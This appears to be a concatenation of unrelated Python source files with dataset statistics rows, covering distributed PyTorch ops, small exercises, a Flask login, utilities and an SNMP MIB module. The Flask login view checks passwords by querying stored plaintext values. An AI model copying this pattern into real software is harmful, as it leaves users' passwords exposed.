ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
# output_grad: [m/q^2, n, h/q]
with torch.no_grad():
# [h/q]
grad = torch.sum(output_grad,
dim=tuple(range(len(output_grad.shape))[:-1]))
bias_grad = reduce_scatter(grad, -1, ctx.B_group_parallel_mode)
dist.reduce(bias_grad,
dst=ctx.src_rank,
group=gpc.get_group(ctx.A_group_parallel_mode))
if gpc.get_local_rank(
ctx.A_group_parallel_mode) != gpc.get_local_rank(
ctx.C_group_parallel_mode):
bias_grad = None
return output_grad, bias_grad, None, None, None, None
class Mul_3D(torch.autograd.Function):
"""Matrix multiplication for :math:`C = A * b`
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any, input_: Tensor, bias: Tensor, depth: int,
input_parallel_mode: ParallelMode,
weight_parallel_mode: ParallelMode,
output_parallel_mode: ParallelMode) -> Tensor:
# input: [m/q^2, n, h/q]
# bias: [h/q^2]
ranks_in_group = gpc.get_ranks_in_group(input_parallel_mode)
src_rank = ranks_in_group[gpc.get_local_rank(output_parallel_mode)]
# [h/q^2]
bias_temp = bias.clone()
dist.broadcast(bias_temp,
src=src_rank,
group=gpc.get_group(input_parallel_mode))
# [h/q]
bias_temp = all_gather(bias_temp, -1, weight_parallel_mode)
# empty_cache()
ctx.save_for_backward(input_, bias_temp)
out = torch.mul(input_, bias_temp)
ctx.depth = depth
ctx.src_rank = src_rank
ctx.A_group_parallel_mode = input_parallel_mode
ctx.B_group_parallel_mode = weight_parallel_mode
ctx.C_group_parallel_mode = output_parallel_mode
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
# output_grad: [m/q^2, n, h/q]
with torch.no_grad():
input_, bias = ctx.saved_tensors
# [m/q^2, n, h/q]
input_grad = torch.mul(output_grad, bias)
# [h/q]
grad = torch.mul(output_grad, input_)
grad = torch.sum(grad,
dim=tuple(range(len(output_grad.shape))[:-1]))
bias_grad = reduce_scatter(grad, -1, ctx.B_group_parallel_mode)
dist.reduce(bias_grad,
dst=ctx.src_rank,
group=gpc.get_group(ctx.A_group_parallel_mode))
if gpc.get_local_rank(
ctx.A_group_parallel_mode) != gpc.get_local_rank(
ctx.C_group_parallel_mode):
bias_grad = None
return input_grad, bias_grad, None, None, None, None
class Sum_3D(torch.autograd.Function):
"""Compute the sum of input tensors
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any,
input_: Tensor,
dim: int,
depth: int,
parallel_mode: ParallelMode,
keepdim: bool = False) -> Tensor:
# input: [m/q^2, n, h/q]
out = torch.sum(input_, dim=dim, keepdim=keepdim)
dist.all_reduce(out, group=gpc.get_group(parallel_mode))
ctx.input_shape = input_.shape
ctx.depth = depth
ctx.group = parallel_mode
ctx.dim = dim
return out
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
with torch.no_grad():
output_grad = output_grad.contiguous()
dist.all_reduce(output_grad, group=gpc.get_group(ctx.group))
if len(output_grad.shape) < len(ctx.input_shape):
output_grad = torch.unsqueeze(output_grad, ctx.dim)
dims = [1 for _ in range(len(output_grad.shape))]
dims[ctx.dim] = ctx.input_shape[ctx.dim]
input_grad = output_grad.repeat(tuple(dims))
return input_grad, None, None, None, None, None
class Reduce_3D(torch.autograd.Function):
"""Reduce input tensors
"""
@staticmethod
@custom_fwd(cast_inputs=torch.float16)
def forward(ctx: Any, input_: Tensor, depth: int,
parallel_mode: ParallelMode) -> Tensor:
dist.all_reduce(input_, group=gpc.get_group(parallel_mode))
return input_.clone()
@staticmethod
@custom_bwd
def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
return output_grad, None, None
# class Slice_3D(torch.autograd.Function):
# """Slice input tensor
# """
# @staticmethod
# @custom_fwd(cast_inputs=torch.float16)
# def forward(ctx: Any, input_: Tensor, dim: int, depth: int,
# parallel_mode: ParallelMode) -> Tensor:
# rank = gpc.get_local_rank(parallel_mode)
# out = torch.chunk(input_, depth, dim=dim)[rank].contiguous()
# ctx.depth = depth
# ctx.parallel_mode = parallel_mode
# ctx.dim = dim
# ctx.input_shape = input_.shape
# return out
# @staticmethod
# @custom_bwd
# def backward(ctx: Any, output_grad: Tensor) -> Tuple[Tensor, ...]:
# with torch.no_grad():
# input_grad = all_gather(output_grad, ctx.dim, ctx.parallel_mode)
# input_grad.reshape(ctx.input_shape)
# return input_grad, None, None, None
| 40.824468 | 105 | 0.568903 | 2,796 | 23,025 | 4.375894 | 0.055794 | 0.152023 | 0.061136 | 0.027462 | 0.782101 | 0.728239 | 0.700776 | 0.662852 | 0.619207 | 0.597793 | 0 | 0.009042 | 0.332378 | 23,025 | 563 | 106 | 40.89698 | 0.786885 | 0.203735 | 0 | 0.637143 | 0 | 0 | 0.003685 | 0 | 0 | 0 | 0 | 0 | 0.005714 | 1 | 0.051429 | false | 0 | 0.022857 | 0.002857 | 0.151429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f82c12ed8951d265d131d91c77eea61d5c672a59 | 187 | py | Python | Cursoemvideo/Desafios/Desafio 29.py | Guilherme-Lanna/Python | fc5b677300f9829eb3ef58c288a083e398ada3fa | [
"MIT"
] | null | null | null | Cursoemvideo/Desafios/Desafio 29.py | Guilherme-Lanna/Python | fc5b677300f9829eb3ef58c288a083e398ada3fa | [
"MIT"
] | null | null | null | Cursoemvideo/Desafios/Desafio 29.py | Guilherme-Lanna/Python | fc5b677300f9829eb3ef58c288a083e398ada3fa | [
"MIT"
] | null | null | null | v = int(input('Velocidade do carro ao passar no radar = '))
m = v-80
if v > 80:
print('O carro estava acima da velocidade permitida')
print('A multa irá custar R${}'.format(m*7))
| 31.166667 | 59 | 0.652406 | 33 | 187 | 3.69697 | 0.787879 | 0.04918 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.033557 | 0.203209 | 187 | 5 | 60 | 37.4 | 0.785235 | 0 | 0 | 0 | 0 | 0 | 0.57754 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.2 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
f83a0b0faefa02aa919355b762075d9c15fc1587 | 590 | py | Python | chapter_3/ex_3-10.py | akshaymoharir/PythonCrashCourse | 742b9841cff61d36567e8706efc69c5f5d5435ff | [
"MIT"
] | null | null | null | chapter_3/ex_3-10.py | akshaymoharir/PythonCrashCourse | 742b9841cff61d36567e8706efc69c5f5d5435ff | [
"MIT"
] | null | null | null | chapter_3/ex_3-10.py | akshaymoharir/PythonCrashCourse | 742b9841cff61d36567e8706efc69c5f5d5435ff | [
"MIT"
] | null | null | null |
## Python Crash Course
# Exercise 3.10: Every Function:
# Think of something you could store in a list.
# For example, you could make a list of mountains, rivers, countries, cities, languages, or any- thing else you’d like.
# Write a program that creates a list containing these items and then uses each function introduced in this chapter at least once .
def main():
print("Skipping this exercise since this is redundant exercise to use previously used functions again.")
if __name__ == '__main__':
main()
| 32.777778 | 148 | 0.657627 | 80 | 590 | 4.75 | 0.7875 | 0.039474 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007092 | 0.283051 | 590 | 17 | 149 | 34.705882 | 0.891253 | 0.666102 | 0 | 0 | 0 | 0 | 0.553763 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0 | 0 | 0.25 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f843b7049cf0fac0b50d40a3b92837a09a8e3362 | 896 | py | Python | application/auth/views.py | villeheikkila/herkkupankki | 5848fbf29197c110d3bddedd1e439834ac8ea988 | [
"MIT"
] | null | null | null | application/auth/views.py | villeheikkila/herkkupankki | 5848fbf29197c110d3bddedd1e439834ac8ea988 | [
"MIT"
] | 2 | 2018-11-27T22:40:51.000Z | 2018-12-15T13:51:35.000Z | application/auth/views.py | villeheikkila/herkkupankki | 5848fbf29197c110d3bddedd1e439834ac8ea988 | [
"MIT"
] | null | null | null | from flask import render_template, request, redirect, url_for
from flask_login import login_user, logout_user
from application import app
from application.auth.models import User
from application.auth.forms import LoginForm
@app.route("/auth/login", methods = ["GET", "POST"])
def auth_login():
if request.method == "GET":
return render_template("auth/loginform.html", form = LoginForm())
form = LoginForm(request.form)
# mahdolliset validoinnit
user = User.query.filter_by(username=form.username.data, password=form.password.data).first()
if not user:
return render_template("auth/loginform.html", form = form,
error = "No such username or password")
login_user(user)
return redirect(url_for("index"))
@app.route("/auth/logout")
def auth_logout():
logout_user()
return redirect(url_for("index")) | 33.185185 | 97 | 0.690848 | 114 | 896 | 5.307018 | 0.377193 | 0.069421 | 0.069421 | 0.079339 | 0.231405 | 0.231405 | 0.135537 | 0 | 0 | 0 | 0 | 0 | 0.19308 | 896 | 27 | 98 | 33.185185 | 0.836791 | 0.02567 | 0 | 0.1 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0.1 | 0.25 | 0 | 0.55 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
f8462801593ecea070691b29edbb3c4767e94112 | 233 | py | Python | mudrex/about.py | surajiyer/mudrex | 341c02b3e7148f5238324f51a36a964ea8076322 | [
"MIT"
] | 1 | 2021-09-07T08:03:51.000Z | 2021-09-07T08:03:51.000Z | mudrex/about.py | surajiyer/mudrex | 341c02b3e7148f5238324f51a36a964ea8076322 | [
"MIT"
] | null | null | null | mudrex/about.py | surajiyer/mudrex | 341c02b3e7148f5238324f51a36a964ea8076322 | [
"MIT"
] | null | null | null | __title__ = 'mudrex'
__version__ = '0.1.2'
__summary__ = 'Send external webhook signals to Mudrex platform.'
__uri__ = 'https://github.com/surajiyer/mudrex'
__author__ = 'Suraj Iyer'
__email__ = 'me@surajiyer.com'
__license__ = 'MIT' | 33.285714 | 65 | 0.746781 | 29 | 233 | 5.034483 | 0.862069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014563 | 0.11588 | 233 | 7 | 66 | 33.285714 | 0.694175 | 0 | 0 | 0 | 0 | 0 | 0.529915 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f85998730f5834af63ac4c2799d1d60a4a6d530d | 2,653 | py | Python | fclsp/laplacian_coef.py | idc9/fclsp | 8e379c88386580df9ab2574e01240a43bd5fa51c | [
"MIT"
] | null | null | null | fclsp/laplacian_coef.py | idc9/fclsp | 8e379c88386580df9ab2574e01240a43bd5fa51c | [
"MIT"
] | null | null | null | fclsp/laplacian_coef.py | idc9/fclsp | 8e379c88386580df9ab2574e01240a43bd5fa51c | [
"MIT"
] | null | null | null | import numpy as np
from scipy.sparse import diags
from sklearn.metrics import pairwise_distances
from fclsp.reshaping_utils import vec_hollow_sym
def get_lap_coef(V, w, var_type, shape):
"""
Computes the Laplacian coefficent vector
TODO: finish documenting
Parameters
----------
V: array-like
w: array-like
var_type: str
Type of the variable. Must be one of ['hollow_sym', 'rect', 'multi'].
shape: tuple of ints
Shape of the variable.
Output
------
lap_coef:
"""
assert var_type in ['hollow_sym', 'rect', 'multi']
if var_type == 'hollow_sym':
return get_lap_coef_hollow_sym(V=V, w=w)
elif var_type == 'rect':
return get_lap_coef_rect(V=V, w=w, shape=shape)
elif var_type == 'multi':
return get_lap_coef_multi(V=V, w=w, shape=shape)
def get_lap_coef_hollow_sym(V, w):
"""
Returns the Laplacian coefficent for an adjaceny matrix.
Let A(x) in R^{d x d} be an adjacency matrix parametatized by its edges x in R^{d choose 2}. Also let V in R^{d times K} and w in R^K for K <= d.
The laplacian coefficient M(V, w) in R^{d choose 2} is the vector such that
M(V, w)^T x = Tr(V^T Laplacian(A(x)) V diag(w))
Parameters
----------
V: array-like, (n_nodes, K)
The input matrix.
w: array-like, (K, )
The input vector.
Output
-------
M(V, w): array-like, (n_nodes choose 2, )
The Laplacian coefficient vector.
"""
assert V.shape[1] == len(w)
coef = pairwise_distances(V @ diags(np.sqrt(w)), metric='euclidean',
n_jobs=None) # TODO: give option
coef = vec_hollow_sym(coef) ** 2
return coef
def get_lap_coef_rect(V, w, shape):
"""
Returns the Laplacian coefficent for a rectuangular matrix.
Parameters
----------
V: array-like, (n_nodes, K)
The input matrix.
w: array-like, (K, )
The input vector.
shape: tuple of two ints
Size of the rectangular matrix matrix.
Output
-------
M(V, w): array-like, (sum(shape), )
The Laplacian coefficient vector.
"""
raise NotImplementedError
def get_lap_coef_multi(V, w, shape):
"""
Returns the Laplacian coefficent for a multi-array.
Parameters
----------
V: array-like, (n_nodes, K)
The input matrix.
w: array-like, (K, )
The input vector.
shape: tuple of two ints
Size of the rectangular matrix matrix.
Output
-------
M(V, w): array-like
The Laplacian coefficient vector.
"""
raise NotImplementedError
| 21.92562 | 149 | 0.598191 | 385 | 2,653 | 4.007792 | 0.264935 | 0.015554 | 0.045366 | 0.033701 | 0.466623 | 0.394038 | 0.269605 | 0.269605 | 0.269605 | 0.217758 | 0 | 0.002619 | 0.280437 | 2,653 | 120 | 150 | 22.108333 | 0.805657 | 0.562759 | 0 | 0.090909 | 0 | 0 | 0.052106 | 0 | 0 | 0 | 0 | 0.016667 | 0.090909 | 1 | 0.181818 | false | 0 | 0.181818 | 0 | 0.545455 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f862ac415f828e0a22935f07ae2502ead0cdf448 | 786 | py | Python | src/server/server_callbacks.py | DuckBoss/AtleastOne-Server | 86be389d4918558f65baa4127a823d14ff4e2ed2 | [
"MIT"
] | null | null | null | src/server/server_callbacks.py | DuckBoss/AtleastOne-Server | 86be389d4918558f65baa4127a823d14ff4e2ed2 | [
"MIT"
] | 6 | 2020-04-27T03:20:39.000Z | 2020-06-20T03:49:08.000Z | src/server/server_callbacks.py | DuckBoss/AtleastOne-Server | 86be389d4918558f65baa4127a823d14ff4e2ed2 | [
"MIT"
] | null | null | null | from threading import Thread
class ServerCallbacks(dict):
def __init__(self):
super().__init__()
self.update({
'on_client_connect': None,
'on_client_disconnect': None,
'on_server_start': None,
})
def register_callback(self, callback, dest):
self[callback] = dest
def remove_callback(self, callback):
try:
del self[callback]
return True
except KeyError:
return False
def get_callback(self, callback):
try:
self[callback]
except KeyError:
return None
def callback(self, callback, *params):
if self[callback]:
thr = Thread(target=self[callback], args=params)
thr.start()
| 23.818182 | 60 | 0.559796 | 79 | 786 | 5.35443 | 0.455696 | 0.255319 | 0.189125 | 0.108747 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.348601 | 786 | 32 | 61 | 24.5625 | 0.826172 | 0 | 0 | 0.153846 | 0 | 0 | 0.066158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.192308 | false | 0 | 0.038462 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f869391639d52fb0f0b3b3152e31b178d13ecb7d | 333 | py | Python | bunruija/tokenizers/space_tokenizer.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | 4 | 2020-12-22T11:12:35.000Z | 2021-12-15T13:30:02.000Z | bunruija/tokenizers/space_tokenizer.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | 4 | 2021-01-16T07:34:22.000Z | 2021-08-14T06:56:07.000Z | bunruija/tokenizers/space_tokenizer.py | tma15/bunruija | 64a5c993a06e9de75f8f382cc4b817f91965223f | [
"MIT"
] | null | null | null | from bunruija.tokenizers import BaseTokenizer
class SpaceTokenizer(BaseTokenizer):
def __init__(self, **kwargs):
super().__init__(name='space')
def __call__(self, text):
result = text.split(' ')
return result
def __repr__(self):
out = f'{self.__class__.__name__}()'
return out
| 22.2 | 45 | 0.633634 | 35 | 333 | 5.342857 | 0.628571 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.246246 | 333 | 14 | 46 | 23.785714 | 0.74502 | 0 | 0 | 0 | 0 | 0 | 0.099099 | 0.081081 | 0 | 0 | 0 | 0 | 0 | 1 | 0.3 | false | 0 | 0.1 | 0 | 0.7 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
f869bdaba494df9c8da46be22e6af9b8a2ccfb84 | 59 | py | Python | python_aulas/aula014_while.py | gilsonaureliano/Python-aulas | 64269872acd482bcf297941ba28d30f13f29c752 | [
"MIT"
] | 1 | 2021-08-05T13:52:12.000Z | 2021-08-05T13:52:12.000Z | python_aulas/aula014_while.py | gilsonaureliano/Python-aulas | 64269872acd482bcf297941ba28d30f13f29c752 | [
"MIT"
] | null | null | null | python_aulas/aula014_while.py | gilsonaureliano/Python-aulas | 64269872acd482bcf297941ba28d30f13f29c752 | [
"MIT"
] | null | null | null | c = 0
while c < 10:
print(c)
c = c + 1
print('FIM') | 11.8 | 13 | 0.457627 | 12 | 59 | 2.25 | 0.583333 | 0.148148 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.105263 | 0.355932 | 59 | 5 | 14 | 11.8 | 0.605263 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f869d690dda6dacf2f93199e09d167ef6faf33a5 | 983 | py | Python | supplement/03_property.py | kaixiang1992/python-learning | c74aa4bec0c72e26cf18f138e6faf110ed64d8c0 | [
"MIT"
] | null | null | null | supplement/03_property.py | kaixiang1992/python-learning | c74aa4bec0c72e26cf18f138e6faf110ed64d8c0 | [
"MIT"
] | 7 | 2020-06-05T23:24:41.000Z | 2021-06-10T19:02:09.000Z | supplement/03_property.py | kaixiang1992/python-learning | c74aa4bec0c72e26cf18f138e6faf110ed64d8c0 | [
"MIT"
] | null | null | null | '''
@description 【Python知识补充】get和set方法 2019/10/05 14:48
'''
class Plane(object):
def __init__(self):
# TODO: 存活状态
self.alive = True
# TODO: 累计积分
self.score = 0
# TODO: 更改存活状态
def set_alive(self, value):
self.alive = value
if value == False:
self.die_action()
# TODO: 获取存活状态
def get_alive(self):
if not self.alive:
self.cancel_schedule()
return self.alive
# TODO: 设置累计积分
def set_score(self, value):
self.score = value
self._update_score_ranking(value)
# TODO: 更新积分排行榜
def _update_score_ranking(self, value):
print('更新积分排行榜:%d'%(value, ))
# TODO: 执行飞机死亡动画
def die_action(self):
print('执行飞机死亡动画!...')
# TODO: 取消事件调度
def cancel_schedule(self):
print('取消事件调度!...')
plane = Plane()
# TODO: 击中状态
hit = True
if hit:
plane.set_alive(False)
plane.set_score(150)
plane.get_alive() | 20.914894 | 51 | 0.568667 | 118 | 983 | 4.567797 | 0.381356 | 0.06679 | 0.048237 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023564 | 0.309257 | 983 | 47 | 52 | 20.914894 | 0.77025 | 0.168871 | 0 | 0 | 0 | 0 | 0.0399 | 0 | 0 | 0 | 0 | 0.021277 | 0 | 1 | 0.259259 | false | 0 | 0 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
f87de822683a7c83c2711cdc3627d3677019f42c | 1,627 | py | Python | ragpicker/reporting/mysql.py | K4lium/Snakepit | c11f3fb7f78b886dad09421bc84a97ee14b9bf0b | [
"MIT"
] | 7 | 2016-09-09T08:09:24.000Z | 2018-03-28T11:51:56.000Z | ragpicker/reporting/mysql.py | Kalium/Snakepit | c11f3fb7f78b886dad09421bc84a97ee14b9bf0b | [
"MIT"
] | 2 | 2016-11-13T01:43:29.000Z | 2017-08-16T07:51:51.000Z | ragpicker/reporting/mysql.py | K4lium/Snakepit | c11f3fb7f78b886dad09421bc84a97ee14b9bf0b | [
"MIT"
] | 8 | 2016-09-09T08:09:37.000Z | 2018-08-15T20:58:14.000Z | # Copyright (C) 2013-2015 Ragpicker Developers.
# This file is part of Ragpicker Malware Crawler - http://code.google.com/p/malware-crawler/
from yapsy.IPlugin import IPlugin
from core.abstracts import Report
class MySQL(IPlugin, Report):
"""Stores data from long-run analysis in MySQL."""
def run(self, results, objfile):
# Import muss hier stehen, sonst kommt es bei Konfiguration ohne Mysql zum Fehler
from core.databaseMysql import DatabaseMySQL
"""Writes report.
@param results: analysis results dictionary.
@param objfile: file object
"""
database = DatabaseMySQL()
print "mysql.py Methode Run"
"""
# Count query using URL hash and file hash
count = database.countRagpickerDB(results["Info"]["file"]["md5"], results["Info"]["url"]["md5"])
# If report available for the file and url -> not insert
if count == 0:
# Create a copy of the dictionary. This is done in order to not modify
# the original dictionary and possibly compromise the following
# reporting modules.
report = dict(results)
# Store the report
database.insertRagpickerDB(report)
"""
def deleteAll(self):
"""Deletes all reports.
"""
print "mysql.py Methode DeleteAll"
"""
# Alle Ragpicker-Daten aus der MongoDB loeschen
count = Database().deleteRagpickerDB()
print "*** MongoDB (Ragpicker)***"
print "deleted documents:" + str(count)
print ""
""" | 36.155556 | 104 | 0.606638 | 179 | 1,627 | 5.513966 | 0.575419 | 0.028369 | 0.024316 | 0.038501 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009632 | 0.298095 | 1,627 | 45 | 105 | 36.155556 | 0.854641 | 0.13276 | 0 | 0 | 0 | 0 | 0.116162 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.333333 | null | null | 0.222222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
f87fbecb1aa5df093ef07d9095b3cbbfa22b5190 | 59,284 | py | Python | pysnmp-with-texts/NSCRTV-ROOT.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 8 | 2019-05-09T17:04:00.000Z | 2021-06-09T06:50:51.000Z | pysnmp-with-texts/NSCRTV-ROOT.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 4 | 2019-05-31T16:42:59.000Z | 2020-01-31T21:57:17.000Z | pysnmp-with-texts/NSCRTV-ROOT.py | agustinhenze/mibs.snmplabs.com | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | [
"Apache-2.0"
] | 10 | 2019-04-30T05:51:36.000Z | 2022-02-16T03:33:41.000Z | #
# PySNMP MIB module NSCRTV-ROOT (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NSCRTV-ROOT
# Produced by pysmi-0.3.4 at Wed May 1 14:25:05 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion, ConstraintsIntersection, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion", "ConstraintsIntersection", "SingleValueConstraint")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
Counter64, Counter32, IpAddress, iso, Gauge32, ObjectIdentity, Bits, Unsigned32, ModuleIdentity, MibIdentifier, TimeTicks, NotificationType, Integer32, MibScalar, MibTable, MibTableRow, MibTableColumn, enterprises = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Counter32", "IpAddress", "iso", "Gauge32", "ObjectIdentity", "Bits", "Unsigned32", "ModuleIdentity", "MibIdentifier", "TimeTicks", "NotificationType", "Integer32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "enterprises")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
nscrtvRoot = MibIdentifier((1, 3, 6, 1, 4, 1, 17409))
nscrtvHFCemsTree = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1))
propertyIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 1))
alarmsIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 2))
commonIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 3))
oaIdent = MibIdentifier((1, 3, 6, 1, 4, 1, 17409, 1, 11))
analogPropertyTable = MibTable((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1), )
if mibBuilder.loadTexts: analogPropertyTable.setStatus('mandatory')
if mibBuilder.loadTexts: analogPropertyTable.setDescription('Attribute Table simulation parameters')
analogPropertyEntry = MibTableRow((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1), ).setIndexNames((0, "NSCRTV-ROOT", "analogParameterOID"))
if mibBuilder.loadTexts: analogPropertyEntry.setStatus('mandatory')
if mibBuilder.loadTexts: analogPropertyEntry.setDescription("Attribute Table simulation parameters head. OID purpose as a table index,Its coding method is'length��OID'��OID former two members'1.3'According to '1'and'3'respectively coding,Instead of ordinary OID encoding (0x2B).")
analogParameterOID = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 1), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: analogParameterOID.setStatus('mandatory')
if mibBuilder.loadTexts: analogParameterOID.setDescription('index')
alarmEnable = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1)).setMaxAccess("readwrite")
if mibBuilder.loadTexts: alarmEnable.setStatus('mandatory')
if mibBuilder.loadTexts: alarmEnable.setDescription("Alarm enable control byte, the corresponding position for the'1 'that allow alarm,'0' a ban warning Bit 0: Alarm enable low Bit 1: Alarm enable low Bit 2: Alarm enable high Bit 3: Alarm enable high Bit 4 ~ 7 reservations should be 0 This object should be stored in nonvolatile memory.")
analogAlarmState = MibTableColumn((1, 3, 6, 1, 4, 1, 17409, 1, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("aasNominal", 1), ("aasHIHI", 2), ("aasHI", 3), ("aasLO", 4), ("aasLOLO", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: analogAlarmState.setStatus('mandatory')
